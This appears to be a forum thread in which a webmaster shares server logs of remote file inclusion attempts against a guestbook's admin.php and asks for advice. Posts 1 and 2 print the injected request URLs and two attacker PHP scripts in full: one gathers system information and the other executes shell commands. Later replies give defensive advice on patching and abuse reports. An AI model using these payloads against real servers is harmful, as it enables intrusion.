Results 1 to 9 of 9

Thread: Who's attacking the Wolfman?

  1. #1
    Senior Member wolfman1984's Avatar
    Join Date
    Aug 2007
    Location
    fangtastic.org
    Posts
    191

    Unhappy Who's attacking the Wolfman?

    The Wolfman was reviewing my server logs today when I came across this:

    Code:
    //admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
    Http Code: 404 	Date: Jan 02 18:41:25 	Http Version: HTTP/1.1 	Size in Bytes: -	
    Referer: - Agent: libwww-perl/5.808
    67.15.175.50
    
    /gbook//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
    Http Code: 200 	Date: Jan 02 18:44:32 	Http Version: HTTP/1.1 	Size in Bytes: 4290
    Referer: - Agent: libwww-perl/5.808
    67.15.175.50
    It looks like someone has written a perl script that is testing my directories for the presence of an admin.php that is vulnerable to a parameter injection attack.

    The second attempt actually found my gbook directory which is used by my Ghoulbook. I'm guessing the script spidered my site for admin.php. For all admin.php files discovered, it attempted the injection.

    Here is the content of Goid.txt

    Code:
    <?
    echo "IndoServ<br>";
    $alb = @php_uname();
    $alb2 = system(uptime);
    $alb3 = system(id);
    $alb4 = @getcwd();
    $alb5 = getenv("SERVER_SOFTWARE");
    $alb6 = phpversion();
    $alb7 = $_SERVER['SERVER_NAME'];
    $alb8 = gethostbyname($SERVER_ADDR);
    $alb9 = get_current_user();
    $os = @PHP_OS;
    echo "os: $os<br>";
    echo "uname -a: $alb<br>";
    echo "uptime: $alb2<br>";
    echo "id: $alb3<br>";
    echo "pwd: $alb4<br>";
    echo "user: $alb9<br>";
    echo "phpv: $alb6<br>";
    echo "SoftWare: $alb5<br>";
    echo "ServerName: $alb7<br>";
    echo "ServerAddr: $alb8<br>";
    echo "IndoServ IRC NetWork<br>";
    exit;
    ?>
    It looks like Goid.txt is trying to display information about my server and my user account.

    http://thermair.co.uk/ is an Air treatment company in the UK. They are probably unaware that there site is being used to harbour internet attacks against web servers.

    A search of the source IP address 67.15.175.50 shows that others have also been attacked.

    So here are my questions:

    1) Has anyone seen this before?
    2) Do you think the Wolfman should notify the Air Treatment company?

    Thanks
    I AM... THE WOLFMAN!!
    The Wolfman's Homepage: http://www.fangtastic.org
    Do you dig the Wolfman?? Sign his Ghoulbook or listen to him Howl

  2. #2
    Senior Member wolfman1984's Avatar
    Join Date
    Aug 2007
    Location
    fangtastic.org
    Posts
    191
    Here is another script being run against my server. I guess this is more popular then I first thought.

    Code:
    <?php
    echo "jimmywho";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;
    I AM... THE WOLFMAN!!
    The Wolfman's Homepage: http://www.fangtastic.org
    Do you dig the Wolfman?? Sign his Ghoulbook or listen to him Howl

  3. #3
    AO übergeek phishphreek's Avatar
    Join Date
    Jan 2002
    Posts
    4,325
    Advanced Guest Book has been known to have vulnerabilities. The specific script they are running against you is a remote file inclusion where they attempt to execute commands on your server.

    It's probably just someone scanning for web vulns. You can see it was a script by looking at the user agent. "libwww-per/5.808". As always, stay current on your updates and check your logs.
    Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you\'ve saved, how much you haven\'t smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.

  4. #4
    Senior Member
    Join Date
    Dec 2007
    Posts
    132
    There's a handful of things it could be. But whatever the person is using, the intent is the same. By the looks of it, the person/bot is just doing recon. The next step is attack. You should definately whois the air company and inform the admin and keep an eye on your logs. I'd ban the IP from my server.

    Also, online ip tracers are a very handy tool. If you enter that IP into one like http://visualiptrace.visualware.com, you'll see it traces back to Houston TX, and the ISP's number is 214-782-7802, and abuse contact is abuse@theplanet.com.

    Save your logs. Paired with the google results, your next step should be to contact the ISP's abuse dept and have that problem handled right there. Make it clear you have evidence (logs+results) that this person is intentionally scanning for vulnerabilities and actively trying to exploit them, otherwise they may just brush you off as another paranoid user.

  5. #5
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    When and if you do send an email to the abuse address. Don't put your analysis in there. Just the plain facts (relevant sections of your logs) as clear text in the body (no attachments). And don't use HTML email.

    If you don't do it properly your abuse complaint may end up in the bitbucket.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  6. #6
    Senior Member t34b4g5's Avatar
    Join Date
    Sep 2003
    Location
    Australia.
    Posts
    2,391

    Smile

    Quote Originally Posted by phishphreek
    Advanced Guest Book has been known to have vulnerabilities. The specific script they are running against you is a remote file inclusion where they attempt to execute commands on your server.

    It's probably just someone scanning for web vulns. You can see it was a script by looking at the user agent. "libwww-per/5.808". As always, stay current on your updates and check your logs.
    I will 2nd this.

    also do a whois on the IP as it is most likely a proxy.

  7. #7
    Elite Hacker
    Join Date
    Mar 2003
    Posts
    1,407
    I just ignore stuff like that. The only time you have to worry about it is if you're running the web application they're trying to exploit. I have fun collecting their remote include scripts though

  8. #8
    Senior Member
    Join Date
    Dec 2007
    Posts
    132
    ^^ When it comes to your server's security, ignorance is not bliss.

  9. #9
    Senior Member wolfman1984's Avatar
    Join Date
    Aug 2007
    Location
    fangtastic.org
    Posts
    191
    Thanks everyone for the great advice. I've contacted the abuse team at theplanet.com, where the attack is coming from. Hopefully I will receive a response soon.
    I AM... THE WOLFMAN!!
    The Wolfman's Homepage: http://www.fangtastic.org
    Do you dig the Wolfman?? Sign his Ghoulbook or listen to him Howl

Similar Threads

  1. I am the Wolfman!
    By wolfman1984 in forum Roll Call
    Replies: 21
    Last Post: September 6th, 2007, 04:41 AM
  2. Attacking RSA-based Sessions in SSL/TLS
    By Nizead in forum Cryptography, Steganography, etc.
    Replies: 0
    Last Post: March 21st, 2003, 03:49 PM
  3. hardware attacking virii
    By geepod in forum AntiVirus Discussions
    Replies: 8
    Last Post: June 13th, 2002, 12:03 PM
  4. attacking a remote computer
    By blayde in forum Non-Security Archives
    Replies: 5
    Last Post: November 18th, 2001, 04:20 PM
  5. attacking ports!!! ( NO OFFENCE HERE)
    By scorpion in forum Security Archives
    Replies: 10
    Last Post: October 23rd, 2001, 11:22 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •